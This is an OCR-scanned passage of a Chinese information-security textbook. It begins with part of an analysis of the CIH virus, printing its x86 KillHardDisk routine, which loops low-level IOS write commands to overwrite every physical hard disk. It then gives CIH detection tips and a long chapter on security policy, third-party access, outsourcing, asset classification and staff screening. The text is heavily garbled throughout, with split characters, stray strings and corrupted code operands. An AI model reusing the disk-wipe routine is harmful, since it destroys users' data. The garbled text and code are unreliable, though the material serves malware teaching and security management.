; IORF SYNC COMMAND 指示 为 同步 命令 (操作 完成 后 才 返 回 ) 
; IORF VERSION 002 指示 为 扩展 BCB(IOR) 格 式 的 IO 请 求 
; IOR start addr[2] = 00 00 00 00 00 00 00 00 起 始 位 置 
(注意 ; 不 是 扇 区 ,而 是 字 节 ) 为 0 
; IOR xfer count = 800h '5j A 2048 个 字 节 
; IOR buffer ptr = 0c0001000h 要 写 的 内 容 在 地 址 0c0001000h 
; IOR vol designtr = 80h 为 第 一 个 物理 硬盘 ,81h 为 第 二 
KillHardDisk: 
xor ebx, ebx 
mov bh, FirstKillHardDiskNumber 
push ebx 
sub esp, 2ch 
push 0c0001000h 
mov bh, 08h 
push ebx 


push ecx 

push ecx 

push ecx 

push 40000501h 

inc ecx 

push ecx 

push ecx 

mov esi,esp 

sub esp, 0ach 

; 以 压 栈 的 形式 构造 IOR( 就 是 上 面 那 一 大 串 数据 ) 
LoopOfKillHardDisk: 

int 20h 

dd 00100004h; 调用 IOS SendCommand 

cmp word ptr [esi + 06h],0017h 

; IOR status = 17h- IORS NO DEVICE 设备 正常 否 ? 
je KillNextDataSection; 写 下 一 块 
ChangeNextHardDisk: 

inc byte ptr [esi * 4dh] 

; 下 个 硬盘 ,80h 为 第 一 个 物理 硬盘 81h 为 第 二 个 


jmp LoopOfKillHardDisk; 继续 杀 杀 杀 !!!1! 

KillNextDataSection: 

add dword ptr [esi+ 10h], ebx 

; 下 个 区 域 ( 以 800h Jj — Ht) 

mov byte ptr [esi * 4dh],FirstKillHardDiskNumber 

; 第 一 个 物理 硬盘 80h 

jmp LoopOfKillHardDisk; 继续 杀 。 

6. 病毒 的 清除 

目前 ,检测 和 清除 CIH 病毒 的 程序 已 有 很 多 ,KV300、 瑞 星 、Norton Antiviurs ,这 些 
病毒 工具 都 非常 有 效 。 本 次 实验 只 给 出 一 般 的 检测 和 清除 方法 和 程序 。 

CD 利用 “资源 管理 器 "进行 搜寻 

具体 的 搜索 方法 为 : 首先 打开 “资源 管理 器 ”, 选 择 菜 单 栏 中 “工具 ”一 “查找 ”一 “文件 或 
文件 夹 ” 选 项 ,在 弹出 的 “查找 文件 "窗口 中 的 “名 称 和 位 置 " 文 本 框 中 输入 查找 路 径 及 文件 名 
(如 * .EXE) ,然后 在 “高 级 ”一 “包含 文字 ” 栏 中 输入 要 查找 的 特征 字符 串 一 一 “CIH v”, 最 
后 单 击 “ 查 找 ” 按 钮 即 可 开始 查找 工作 。 如 果 在 查找 过 程 中 ,显示 出 一 大 堆 符 合 查 找 特 征 的 
可 执行 文件 , 则 表明 计算 机 上 已 经 感染 了 CIH 病毒 。 

但 这 种 方法 中 存在 着 一 个 致命 的 缺点 , 那 就 是 : 如 果 用 户 已 感染 了 CIH 病毒 ,那么 这 
样 一 个 大 面积 的 搜索 过 程 实际 上 也 是 在 扩大 病毒 的 感染 面 。 

(2) Debug 检测 PE Signature 

用 \Windows\command\debug. com 检测 . EXE。 

通过 “程序 ”进入 *MS-DOS 方式 ,在 MS DOS 方式 下 : 


3x 


DEBUG XXX. EXE 
-DCS: 3F 41 


如 果 显示 的 值 是 0x554550(“UPE”), 则 该 文件 有 可 能 已 经 感染 了 CIH 病毒 。 通 过 以 
上 的 分 析 , 可 以 得 出 ,单机 版 病毒 主要 是 针对 计算 机 的 硬件 ,包括 硬盘 、BIOS 进行 相应 的 破 
坏 , 造 成 主机 无 法 启动 。 


ASSAEEAPREK. 


How 


第 7 章 安全 策略 


7.1 安全 策略 概述 


信息 安全 策略 的 目标 是 提供 管理 指导 ,保证 信息 安全 。 安 全 策略 是 由 企业 (机 构 ) 自 身 
或 企业 与 独立 且 可 信 的 第 三 方 安全 机 构 一 起 制定 的 一 系列 规范 的 管理 对 象 和 约束 文档 。 这 
些 文档 如 同 企业 标准 一 样 ,确定 了 企业 需要 保护 的 对 象 , 并 明确 定义 了 怎样 识别 和 评估 这 些 
对 象 。 根 据 确定 的 保护 对 象 . 策 略 将 定义 一 组 管理 或 使 用 的 方法 ,使 策略 的 执行 者 在 面 对 受 
保护 的 对 象 时 能 采取 正确 的 行为 。 策 略 将 指导 企业 (机 构 ) 员 工 的 日 常 行为 。 特 别 是 在 面 对 
受 保护 对 象 时 ,策略 明确 规定 了 什么 能 做 ,什么 不 能 做 。 在 策略 实施 后 ,员工 必须 严格 执行 
策略 。 如 果 员 工 违 反 了 策略 ,即使 并 未 对 企业 (机 构 ) 造 成 实际 损失 ,也 必须 受到 相应 处 罚 。 

管理 层 应 制定 一 个 明确 的 安全 策略 方向 ,并 通过 在 整个 组 织 中 发 布 和 维护 信息 安全 策 
Wt ,表明 自己 对 信息 安全 的 支持 和 保护 责任 。 

1. 信息 安全 策略 文档 

策略 文档 应 该 由 管理 层 批准 ,根据 情况 向 所 有 员工 公布 传达 。 文 档 应 说 明 管理 人 员 承 
担 的 义务 和 责任 ,并 制定 组 织 的 管理 信息 安全 的 步 又。 至 少 应 包括 以 下 指导 原则 。 

(1) 信息 安全 的 定义 、 其 总 体 目标 及 范围 以 及 安全 作为 保障 信息 共享 的 机 制 所 具有 的 

(2) 陈述 信息 安全 的 管理 意图 、 支 持 目标 以 及 指导 原则 。 

(3) 简要 说 明 安全 策略 ,原则 ,标准 以 及 需要 遵守 的 各 项 规定 。 这 对 组 织 非常 重要 , 例 
如 : 符合 法 律 和 合约 的 要 求 ; 安全 教育 的 要 求 ; 防止 并 检测 病毒 和 其 他 恶意 软件 ; 业务 连 
续 性 管理 ; 违反 安全 策略 的 后 果 。 

(4) 确定 信息 安全 管理 的 一 般 责任 和 具体 责任 ,包括 报告 安全 事故 。 

O 参考 支持 安全 策略 的 有 关 文献 ,例如 ,针对 特定 信息 系统 的 更 为 详尽 的 安全 策略 和 
方法 以 及 用 户 应 该 遵守 的 安全 规则 。 安 全 策略 应 该 向 组 织 用 户 传达 ,形式 上 是 针对 目标 读 
者 ,并 为 读者 接受 和 理解 。 

2. 审查 评估 

每 个 策略 应 该 有 一 个 负责 人 ,根据 明确 规定 的 审查 程序 对 策略 进行 维护 和 审查 。 审 查 
过 程 应 该 确保 在 发 生 影 响 最 初 风险 评估 的 基础 的 变化 (如 发 生 重 大 安全 事故 .出 现 新 的 漏洞 
以 及 组 织 或 技术 基础 结构 发 生变 更 ) 时 ,对 策略 进行 相应 的 审查 。 还 应 该 进行 以 下 预定 的 、 
阶段 性 的 审查 : 

(1) 检查 策略 的 有 效 性 ,通过 所 记录 的 安全 事故 的 性 质 、 数 量 以 及 影响 反映 出 来 ; 

(2) 控制 措施 的 成 本 及 其 业务 效率 的 影响 ; 

(3) 技术 变化 带 来 的 影响 。 


7.2 组 织 的 安全 


7.2.1 信息 安全 基础 


为 了 管理 组 织 内 部 的 信息 安全 ,企业 (机 构 ) 应 该 建立 管理 框架 ,在 组 织 内 部 开展 和 控制 
信息 安全 的 管理 实施 。 应 该 建立 有 管理 领导 层 参加 的 管理 论坛 ,以 批准 信息 安全 策略 、 分 配 
安全 责任 并 协调 组 织 范围 的 安全 策略 实施 。 根 据 需 要 ,应 该 建立 专家 提出 信息 安全 建议 的 
渠道 ,并 供 整 个 组 织 使 用 。 建 立 与 公司 外 部 的 安全 专家 的 联系 ,保持 与 业界 的 潮流 ,监视 标 
准 和 评估 方法 同步 ,并 在 处 理 安全 事故 时 吸收 他 们 的 观点 。 应 该 鼓励 采用 跨 学 科 S LER 
信息 安全 方法 ,例如 ,让 管理 人 员 用户、 行政 人 员 、 应 用 程序 设计 人 人员、 审计 人 员 以 及 安全 人 
员 和 专家 协同 工作 ,让 他 们 参与 保险 和 风险 管理 的 工作 。 

1. 管理 信息 安全 论坛 

信息 安全 是 一 种 由 管理 团队 所 有 成 员 共同 承担 的 业务 责任 。 应 该 建立 一 个 管理 论坛 ， 
确保 对 安全 措施 有 一 个 明确 的 方向 并 得 到 管理 层 的 实际 支持 。 论 坛 应 通过 合理 的 责任 分 配 
和 有 效 的 资源 管理 促进 组 织 内 部 安全 。 该 论坛 可 以 作为 目前 管理 机 构 的 一 个 组 成 部 分 。 通 
dí ,管理 信 息 安全 论坛 有 以 下 作用 。 

CD 审查 和 核准 信息 安全 策略 以 及 总 体 责任 。 

(2) 当 信 息 资产 暴露 受到 严重 威胁 时 ,监视 重大 变化 。 

(3) 审查 和 监控 安全 事故 。 

(4) 审核 加 强 信息 安全 的 重要 活动 。 

(5) 一 个 管理 人 员 应 负责 所 有 与 安全 相关 的 活动 。 

2. 信息 安全 的 协调 

在 大 型 组 织 中 ,需要 建立 一 个 与 组 织 规模 相宜 的 跨 部 门 管理 论坛 ,由 组 织 有 关 部 门 的 管 
理 代表 参与 ,通过 论坛 协调 信息 安全 控制 措施 的 实施 情况 。 通 常 , 这 类 论坛 有 以 下 作用 。 

(1) 就 整个 公司 的 信息 安全 的 作用 和 责任 达成 一 致 。 

(2) 就 信息 安全 的 特定 方法 和 处 理 过 程 达成 一 致 ,如 风险 评估 、 安 全 分 类 系统 。 

(3) 就 整个 公司 的 信息 安全 活动 达成 一 致 并 提供 支持 ,例如 安全 警报 程序 。 

(4) 确保 将 安全 作为 制订 信息 计划 的 一 个 部 分 。 

(5) 对 控制 措施 是 否 完善 进行 评估 ,并 协调 新 系统 或 新 服务 的 特定 信息 安全 控制 措施 
的 实施 情况 。 

(6) 审查 信息 安全 事故 。 

(7) 在 整个 组 织 中 增加 对 信息 安全 工作 支持 的 力度 。 

3. 信息 安全 责任 的 划分 

应 该 明确 保护 个 人 资产 和 执行 具体 安全 程序 步骤 的 责任 。 信 息 安全 策略 应 提供 在 组 织 
内 分 配 安全 任务 和 责任 的 一 般 指导 原则 。 如 果 需 要 ,可 以 为 特定 的 站 点 、 系 统 或 服务 补充 更 
加 详细 的 指导 原则 。 应 明确 说 明 对 各 个 实际 资产 和 信息 资产 以 及 安全 进程 (如 业务 连续 性 
规划 ) 的 保护 责任 。 

在 很 多 组 织 中 ,指定 信息 安全 管理 员 负 责 开 展 和 实施 安全 保护 ,并 帮助 确定 控制 措施 。 
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但 是 ,资源 管理 以 及 实施 控制 措施 仍 由 各 个 管理 人 员 负 责 。 一 种 常用 的 方法 是 为 每 项 信息 
资产 指定 一 个 所 有 者 ,并 由 他 负责 该 资产 的 日 常安 全 问题 。 

信息 资产 的 所 有 者 将 其 所 承担 的 安全 责任 委托 给 各 个 管理 人 员 或 服务 提供 商 。 尽 管 所 
有 者 仍 对 该 资产 的 安全 负 有 最 终 责 任 , 但 可 以 确定 被 委托 的 人 是 否 正确 履行 了 责任 。 一定 
要 明确 说 明 各 个 管理 人 员 所 负责 的 范围 ; 特别 是 要 明确 以 下 范围 。 

(1) 必须 确定 并 明确 说 明 由 谁 负 责 各 种 资产 和 与 每 个 系统 相关 的 安全 进程 。 

(2) 应 该 确定 负责 各 个 资产 和 安全 进程 的 管理 人 员 ,并 记录 责任 的 具体 落实 情况 。 

(3) 应 明确 规定 授权 级 别 并 进行 备案 。 

4. 信息 处 理 设施 的 授权 程序 

对 于 新 的 信息 处 理 设施 ,应 该 制定 管理 授权 程序 。 

应 考虑 以 下 问题 。 

CD 新 设施 应 获得 适当 的 用 户 管理 审核 ,授权 新 设施 的 范围 和 使 用 。 应 获得 负责 维护 
本 地 信息 系统 安全 环境 的 管理 人 员 的 批准 ,以 确保 符合 所 有 相关 安全 策略 和 要 求 。 

(2) 如 果 需 要 ,应 检查 硬件 和 软件 以 确保 它们 与 其 他 系统 组 件 兼 容 。 

(3) 请 注意 , 某 些 连接 可 能 需要 对 类 型 进行 核实 。 

(4) 使 用 个 人 信息 处 理工 具 处 理 业 务 信息 和 其 他 必要 的 控制 措施 应 得 到 授权 。 

C5) 在 工作 场所 使 用 个 人 信息 处 理工 具 会 带 来 新 的 漏洞 ,因此 需要 进行 评估 和 授权 。 

在 联网 的 环境 中 ,这 些 控制 措施 特别 重要 。 

5. 专家 信息 安全 建议 

很 多 组 织 都 需要 专家 级 的 信息 安全 建议 。 理 想 情 况 下 ,一 位 资深 的 全 职 信息 安全 顾问 
应 该 提出 以 下 建议 。 并 不 是 所 有 组 织 都 希望 雇佣 专家 顾问 。 在 这 种 情况 下 ,建议 专家 负责 
协调 公司 内 部 的 知识 和 经 验资 源 , 以 确保 协调 一 致 ,并 在 安全 决策 方面 提供 帮助 。 各 个 组 织 
应 该 与 公司 以 外 的 顾问 保持 联系 ,在 自己 不 了 解 的 领域 ,倾听 他 们 的 专门 建议 。 

信息 安全 顾问 或 其 他 专家 应 负责 为 信息 安全 的 各 种 问题 提供 建议 ,这 些 意 见 既 可 以 来 
自 他 们 本 人 ,也 可 以 来 自 外 界 。 组 织 的 信息 安全 工作 的 效率 如 何 , 取 决 于 他 们 对 安全 威胁 评 
估 的 质量 和 建议 使 用 的 控制 措施 。 为 得 到 最 高 的 效率 和 最 好 的 效果 ,信息 安全 顾问 可 以 直 
接 与 管理 层 联系 。 

在 发 生 可 疑 的 安全 事故 或 破坏 行为 时 ,应 尽早 向 信息 安全 顾问 或 其 他 专家 进行 咨询 ,以 
得 到 专家 的 指导 或 可 供 研 究 的 资源 。 尽 管 多 数 内 部 安全 调查 是 在 管理 层 的 控制 下 进行 的 ， 
但 仍然 应 该 邀请 安全 顾问 ,倾听 他 们 的 建议 ,或 由 他 们 领导 .实施 这 一 调研 活动 。 

6. 组 织 间 的 合作 

与 执法 机 关 ,管理 部 门 、 信 息 服务 提供 商 和 通信 运营 商 签署 的 合同 应 保证 : 在 发 生 安全 
事故 时 ,能 迅速 采取 行动 并 获得 建议 。 同 样 的 ,也 应 该 考虑 加 入 安全 组 织 和 业界 论坛 。 

应 严格 限制 对 安全 信息 的 交换 ,以 确保 组 织 的 保密 信息 没有 传播 给 未 经 授权 的 人 。 

7. 信息 安全 的 独立 评审 

信息 安全 策略 文档 制定 了 信息 安全 的 策略 和 责任 。 必 须 对 该 文档 的 实施 情况 进行 独立 
审查 ,确保 组 织 的 安全 实践 活动 不 仅 符合 策略 的 要 求 ,而 且 是 灵活 高 效 的 。 审 查 工作 应 该 由 
组 织 内 部 的 审计 职能 部 门 、 独 立 管理 人 员 或 专门 提供 此 类 服务 的 第 三 方 组 织 负责 执行 ,而 且 
这 些 人 员 必 须 具 备 相 应 的 技能 和 经 验 。 


7.2.2 第 三 方 访问 的 安全 性 


为 了 维护 第 三 方 访问 的 组 织 信息 处 理 设施 和 信息 资产 的 安全 性 。 企 业 (机构 ) 要 严格 控 
制 第 三 方 对 组 织 的 信息 处 理 设备 的 使 用 。 如 果 存 在 对 第 三 方 访问 的 业务 需求 ,必须 进行 风 
险 评估 ,以 确定 所 涉及 的 安全 问题 和 控制 要 求 。 必 须 与 第 三 方 就 控制 措施 达成 一 致 ,并 在 合 
同 中 规定 。 

第 三 方 的 访问 可 能 涉及 其 他 人 员 。 授 予 第 三 方 访问 权限 的 合约 应 该 包括 允许 指定 其 他 
符合 条 件 的 人 员 进 行 访问 和 有 关 条 件 的 规定 条 款 。 

1. 确定 第 三 方 访问 的 风险 

(1) 访问 类 型 

允许 第 三 方 使 用 的 访问 类 型 非常 重要 。 例 如 ,通过 网 络 连 接 进 行 访问 所 带 来 的 风险 与 
实际 访问 所 带 来 的 风险 截然 不 同 。 应 考虑 的 访问 类 型 有 : 实际 访问 (如 对 办 公 室 、 计 算 机 
房 、 档 案 室 的 访问 ) 和 逻辑 访问 (如 对 组 织 的 数据 库 、 信 息 系统 的 访问 ) 。 

(2) 访问 理由 

例如 , 某 些 向 组 织 提供 服务 的 第 三 方 不 在 工作 现场 ,但 可 以 授予 他 们 物理 和 逮 辑 访问 的 
权限 ,诸如 : 

CD 硬件 和 软件 支持 人 员 : 需要 访问 系统 级 别 或 低级 别 的 应 用 程序 功能 ， 

© 贸易 伙伴 或 该 组 织 创办 的 合资 企业 : 与 组 织 交换 信息 .访问 信息 系统 或 共享 数 
据 库 。 

如 果 不 进行 充分 的 安全 管理 就 允许 第 三 方 访问 数据 , 则 信息 被 置 于 很 危险 的 境地 。 凡 
有 业务 需要 与 第 三 方 连接 时 ,就 需要 进行 风险 评估 ,以 确定 具体 的 控制 措施 要 求 。 还 需要 考 
虑 以 下 因素 : 所 需 的 访问 类 型 .信息 的 价值 .第 三 方 所 使 用 的 控制 措施 以 及 该 访问 对 该 组 织 
信息 的 安全 性 可 能 带 来 的 影响 。 

(3) 现场 承包 商 

按照 合约 的 规定 ,第 三 方 在 现场 工作 一 段 时 间 后 也 会 留 下 导致 安全 隐患 。 第 三 方 在 现 
场 的 情况 有 : 硬件 和 软件 的 支持 维护 人 员 ; 清洁 人 员 、 送 餐 人 员 、 保 安 以 及 其 他 外 包 的 支持 
服务 人 员 ; 为 学 生 提供 的 职位 和 其 他 临时 性 的 短期 职位 ; 咨询 人 员 。 

要 对 第 三 方 使 用 信息 处 理 设备 进行 管理 ,了 解 要 使 用 什么 控制 措施 是 至 关 重 要 的 。 通 
常 ,第 三 方 访问 会 带 来 新 的 安全 要 求 或 内 部 控制 措施 ,这 些 都 应 该 在 与 第 三 方 的 合同 中 体现 
出 来 。 例 如 ,如 果 对 信息 的 保密 性 有 特殊 的 要 求 , 应 签署 保密 协议 。 

只 有 实施 了 相应 的 控制 措施 ,并 在 合同 中 明确 规定 了 连接 或 访问 的 条 款 ,才能 允许 第 三 
方 访问 信息 和 使 用 信息 处 理 设备 。 

2. 第 三 方 合同 的 安全 要 求 

第 三 方 对 组 织 信息 处 理 设施 的 访问 ,应 该 根据 包含 所 有 必要 安全 要 求 的 正式 合同 进行 ， 
确保 符合 组 织 的 安全 策略 和 标准 。 应 确保 组 织 和 第 三 方 之 间 对 合同 内 容 不 存在 任何 歧义 。 
为 满足 供应 商 ,组织 应 首先 满足 自己 。 在 合约 中 应 考虑 以 下 条 款 

(1) 信息 安全 的 常规 策略 。 

(2) 对 资产 的 保护 ,包括 : 保护 包括 信息 和 软件 在 内 的 组 织 资产 的 步骤 ; 确认 资产 的 安 
全 是 否 受 到 威胁 的 步骤 (如 数据 丢失 或 被 修改 ) 。 
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(3) 相应 的 控制 措施 ,以 保证 在 合同 终止 时 ,或 在 合同 执行 期 间 某 个 双方 认可 的 时 间 
点 ,将 信息 和 资产 归还 或 销毁 。 
(4) 完整 性 和 可 用 性 。 
(5) 严格 限制 复制 信息 和 泄露 信息 。 
(6) 说 明 每 个 可 提供 的 服务 。 
(7) 期 望 的 服务 水 平和 不 可 接受 的 服务 水 平 。 
(8) 在 适当 的 时 候 撤换 员工 的 规定 。 
D 达成 各 方 义务 的 协议 。 
(100 与 法 律 事务 相关 的 责任 (如 数据 保护 法 规 )。 如 果 合 同 涉及 与 其 他 国家 的 组 织 进 
行 合作 ,应 考虑 到 各 个 国家 法 律 系统 之 间 的 差异 。 
(11) 知识 产权 COPRs) 和 版 权 转让 以 及 对 合 著 的 保护 。 
2) 访问 控制 协议 ,包括 : 允许 使 用 的 访问 方法 ,以 及 控制 措施 和 对 唯一 标识 符 的 使 
用 ,如 用 户 ID 和 口令 。 
3) 用 户 访问 和 权限 的 授权 程序 。 
4) 保留 得 到 有 权 使 用 服务 的 人 员 清 单 , 以 及 他 们 具体 享有 哪些 权限 。 
5) 确定 可 核实 的 执行 标准 ,监视 及 报告 功能 。 
6) 监视 ,撤销 用 户 活动 的 权限 。 
(17) 审计 合同 责任 或 将 审计 工作 交 由 第 三 方 执行 的 权限 。 
(18) 建立 一 种 解决 问题 的 渐进 过 程 ; 在 需要 时 应 要 考虑 如 何 执行 应 急 措施 。 
(19) 与 硬件 和 软件 安装 维护 相关 的 责任 。 
(20) 明晰 的 报告 结构 和 双方 认可 的 报告 格式 。 
(21) 变更 管理 的 明确 制定 过 程 。 
(22) 所 需 的 物理 保护 控制 措施 和 机 制 , 以 确保 所 有 操作 都 符合 控制 措施 的 要 求 。 
(23) 对 用 户 和 管理 员 进 行 的 方法 ,步骤 和 安全 方面 的 培训 。 
(24) 保证 免 受 恶意 软件 攻击 的 控制 措施 。 
(25) 规定 如 何 报告 .通知 和 调查 安全 事故 以 及 安全 违反 行为 。 
(26) 第 三 方 与 分 包 商 之 间 的 参与 关系 。 


7.3 外 包 


外 包 的 目标 是 在 将 信息 处 理 责 任 外 包 给 另 一 组 织 时 保障 信息 安全 。 在 双方 的 合同 中 ， 
外 包 协 议 应 阐明 信息 系统 .网 络 和 /或 桌面 环境 中 存在 的 风险 、 安 全 控制 措施 以 及 方法 
步骤 。 

如 果 将 所 有 或 部 分 信息 系统 .网 络 和 /或 桌面 环境 的 管理 和 控制 进行 外 包 , 则 应 在 双方 
签 定 的 合同 中 反映 组 织 的 安全 要 求 。 

例如 ,合同 中 应 阐明 : 

COD 如 何 符合 法 律 要 求 , 如 数据 保护 法 规 ; 

(2) 应 该 如 何 规定 保证 外 包 合 同 中 的 参与 方 (包括 转 包 商 ) 都 了 解 各 自 的 安全 责任 ; 

(3) 如 何 维 护 并 检测 组 织 的 业务 资产 的 完整 性 和 保密 性 ; 


(4) 应 该 使 用 何 种 物理 和 逻辑 控制 措施 ,限制 授权 用 户 对 组 织 的 敏感 业务 信息 的 访问 ; 

O) 在 发 生 灾难 事故 时 ,如 何 维护 服务 的 可 用 性 ; 

(6) 为 外 包 出 去 的 设备 提供 何 种 级 别 的 物理 安全 保护 ; 

(7) 审计 人 员 的 权限 。 

合同 应 允许 在 安全 管理 计划 详细 说 明 安 全 要 求 和 程序 步骤 移植 ,使 合同 双方 就 此 达成 
一 致 。 
尽管 外 包 合同 会 带 来 一 些 复杂 的 安全 问题 ,本 业务 规则 中 的 控制 措施 可 以 作为 一 个 认 
可 安全 管理 计划 的 结构 和 内 容 的 起 点 。 

资产 分 类 管理 的 目标 是 对 组 织 资产 进行 适当 的 保护 。 所 有 主要 的 信息 资产 应 进行 登 
记 , 并 指定 资产 的 所 有 人 。 确 定 资产 的 责任 帮助 确保 能 够 提供 适当 的 保护 。 应 确定 所 有 主 
要 资产 的 所 有 者 ,并 分 配 维护 该 资产 的 责任 。 可 以 委托 负责 实施 控制 措施 的 责任 。 资 产 的 
责任 由 资产 的 指定 所 有 者 负责 。 

1. 资产 目录 

资产 清单 能 帮助 您 确保 对 资产 实施 有 效 地 保护 ,也 可 以 用 于 其 他 商业 目的 ,如 保健 、 金 
融 保 险 等 (资产 评估 )。 编 辑 资产 清单 的 过 程 是 资产 评估 的 一 个 重要 方面 。 组 织 应 确定 其 资 
产 及 其 相对 价值 和 重要 性 。 利 用 以 上 信息 ,组 织 可 以 根据 资产 的 重要 性 和 价值 提供 相应 级 
别 的 保护 。 应 该 为 每 个 信息 系统 的 关联 资产 草拟 并 保存 一 份 清单 。 应 该 明确 确认 每 项 资产 
及 其 所 有 权 和 安全 分 类 。 各 方 就 此 达成 一 致 并 将 其 当前 状况 进行 备案 (这 一 点 在 资产 发 生 
损坏 ,进行 索赔 时 非常 重要 ) 。 与 信息 系统 相关 联 的 资产 示例 有 : 

CD 信息 资产 : 数据 库 和 数据 文件 .系统 文档 ,用 户 手册 .培训 材料 .操作 或 支持 步骤 、 
连续 性 计划 .退守 计划 .归档 信息 。 

(2) 软件 资产 : 应 用 程序 软件 .系统 软件 .开发 工具 以 及 实用 程序 。 

(3) 物质 资产 : 计算 机 设备 (处 理 器 ,监视 器 、. 膝 上 型 计算 机 、 调 制 解 调 器 ) .通信 设备 
(路 由 器 .PABX. 传 真 机 、 应 答 机 )、 磁 介质 (磁带 和 磁盘 )、 其 他 技术 设备 (电源 、 空 调 器 ) 、 家 
具 、 机 房 。 

(4) 服务 : 计算 和 通信 服务 .常用 设备 ,如 加 热 器 .照明 设备 电源、 空调。 

2. 信息 分 类 

信息 分 类 的 目标 是 保证 信息 资产 得 到 适当 的 保护 。 应 该 对 信息 分 类 ,指明 其 需要 、 优 先 
顺序 和 保护 级 别 。 信 息 的 敏感 程度 和 关键 程度 各 不 相同 。 有 些 信 息 需 要 加 强 保护 或 进行 特 
别 对 待 。 可 以 使 用 信息 分 类 系统 定义 合适 的 保护 级 别 , 并 解释 对 特别 处 理 手段 的 需要 。 

(1) 分 类 原则 

在 对 信息 进行 分 类 并 制定 相关 的 保护 性 控制 措施 时 ,应 该 考虑 的 问题 : 对 共享 信息 或 
限制 信息 共享 的 业务 需求 ,以 及 与 这 种 需求 相关 的 业务 影响 ,如 对 信息 未 经 授权 的 访问 或 损 
害 。 通 常 , 对 信息 的 分 类 是 确定 如 何 处 理 和 保护 信息 的 简略 方法 。 应 按照 信息 的 价值 和 对 
于 组 织 的 敏感 程度 ,对 信息 和 系统 处 理 分 类 数据 的 结果 进行 分 类 。 也 可 以 按 信息 对 组 织 的 
关键 程度 分 类 ,如 按照 其 可 用 性 和 完整 性 分 类 。 

经 过 一 段 时 间 后 ,例如 该 信息 已 被 公之于众 ,信息 就 变 得 不 那么 敏感 和 重要 了 。 必 须 将 
这 些 问题 考虑 在 内 ,分 类 过 粗 会 导致 不 必要 的 额外 业务 开销 。 分 类 指导 原则 预计 到 并 接受 
这 样 一 个 事实 : 信息 的 分 类 不 是 固定 不 变 的 ,可 以 根据 预定 策略 进行 更 改 。 也 应 该 考虑 到 
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信息 类 别 的 数量 和 进行 分 类 的 优点 。 过 于 复杂 的 分 类 会 使 人 感觉 非常 麻烦 ,使 用 起 来 很 不 
合算 或 没有 实用 价值 。 在 解释 其 他 组 织 文档 中 的 分 类 标记 时 也 应 该 注意 ,因为 相同 或 相似 
的 标记 的 定义 可 能 不 同 。 对 信息 进行 分 类 ,如 对 文档 ,数据 记录 、 数 据 文 件 或 磁盘 进行 分 类 ， 
以 及 对 分 类 定期 审查 等 , 仍 由 该 信息 的 最 初 所 有 者 或 指定 所 有 者 负责 执行 。 

(2) 信息 标识 和 处 理 

根据 组 织 采用 的 分 类 方法 ,明确 标记 和 处 理 信 息 的 妥善 步骤 ,是 非常 重要 的 。 这 些 步骤 
应 包括 实际 存在 的 信息 和 电子 形式 的 信息 的 标记 和 处 理 步 又。 对 于 每 个 类 别 ,应 明确 说 明 ， 
处 理 步骤 包括 以 下 类 别 的 信息 处 理 活动 : 复制 ; 存储 ; 通过 邮寄 、 传 真 和 电子 邮件 进行 传 
输 ; 通过 移动 电话 .语音 邮件 .应答 机 等 交谈 方式 进行 传输 ; 破坏 。 

系统 输出 结果 包含 敏感 或 关键 信息 ,应 带 有 相应 的 分 类 标记 (输出 结果 中 )。 标 记 应 能 
反映 出 创建 的 规则 进行 分 类 的 结果 。 需 要 考虑 的 问题 包括 : 打印 出 的 报告 .屏幕 显示 结果 、 
记录 信息 的 介质 (磁带 、 磁 盘 ) .电子 消息 和 文件 的 传输 问题 。 最 合适 的 标记 形式 就 是 贴 上 一 
张 看 得 见 、 摸 得 着 的 标签 。 但 是 ,有 些 信 息 资 产 ( 如 电子 格式 的 文档 ) 不 能 贴 上 实际 的 标签 ， 
需要 使 用 电子 方式 的 标记 方法 。 

人 员 安 全 管理 的 目标 是 降低 设施 误 操 作 、 偷 窃 .诈骗 或 滥用 等 方面 的 人 为 风险 。 在 招聘 
阶段 ,就 应 该 说 明 安 全 责任 ,将 其 写 和 人 合同 ,并 在 雇佣 期 间 进 行 监督 。 对 候选 新 员工 应 充分 
进行 筛选 ,特别 是 对 于 从 事 敏 感 工 作 的 员工 更 是 如 此 。 所 有 员工 和 使 用 信息 处 理 设 施 的 第 
三 方 用 户 都 应 签署 保密 (不 公开 ) 协 议 。 


7.4 工作 责任 中 的 安全 因素 


在 组 织 的 信息 安全 策略 中 应 该 阐明 安全 任务 和 职责 ,并 进行 备案 。 还 应 包括 实施 和 维 
护 安全 策略 的 总 体 责任 ,以 及 保护 特殊 资产 ,执行 特殊 安全 程序 或 活动 的 责任 。 

1. 人 员 选 拔 策略 

在 考虑 就 业 申请 时 应 该 对 固定 员工 进行 审查 。 审 查 应 包括 以 下 内 容 : 

D 是 否 有 令 人 满意 的 个 人 介绍 信和 ,可 以 由 某 个 组 织 或 个 人 出 具 ; 

(2) 对 申请 人 简历 的 完整 性 和 准确 性 进行 检查 ; 

(3) 对 申请 人 声明 的 学 术 和 专业 资格 进行 证 实 ; 

(4) 进行 独立 的 身份 检查 (护照 或 类 似 文件 ) 。 

如 果 某 个 职位 ,不 管 是 外 部 招聘 还 是 内 部 提升 员工 ,涉及 可 以 访问 信息 处 理 设备 的 人 
员 ,特别 是 那些 处 理 敏感 信息 (如 财务 信息 或 绝密 信息 ) 的 个 人 ,组 织 必须 对 该 人 员 进 行 信用 
检查 。 对 于 具有 很 高 权力 的 员工 ,应 该 定期 进行 一 次 此 类 检查 。 对 承包 商 和 临时 性 员工 ,也 
应 执行 类 似 的 选拔 过 程 。 如 果 这 些 员工 是 代理 机 构 介 绍 的 ,在 与 代理 机 构 的 合同 中 应 该 注 
明 的 事项 : 代理 机 构 的 选拔 责任 ,以 及 如 果 代 理 机 构 没 有 完整 执行 选拔 过 程 ,或 选拔 结果 有 
疑问 时 ,代理 机 构 应 遵循 的 通知 本 方 的 步骤 。 

管理 层 应 有 权 访 问 敏感 系统 ,以 评估 对 新 的 员工 和 经 验 不 足 的 员工 的 调查 结果 。 所 有 
员工 的 工作 都 应 由 高 级 员工 进行 定期 审查 和 审核 。 

管理 人 员 应 该 知道 ,员工 的 个 人 情况 会 对 他 们 的 工作 产生 影响 。 个 人 或 财务 上 的 问题 、 
行为 或 生活 方式 上 的 变化 .经常 旷工 以 及 在 压力 或 痛苦 的 心情 下 工作 ,都 会 导致 欺骗 .盗窃 、 


工作 出 错 或 其 他 安全 问题 。 应 在 自己 的 权限 范围 内 ,根据 相应 的 规定 ,妥善 处 理 这 些 问题 。 

2. 保密 协议 

签署 保密 协议 的 目的 是 提醒 签约 人 注意 ,这 些 信 息 是 保密 的 。 员 工 应 该 签 定 保 密 协议 
并 将 其 作为 初步 雇佣 的 条 款 和 条 件 。 

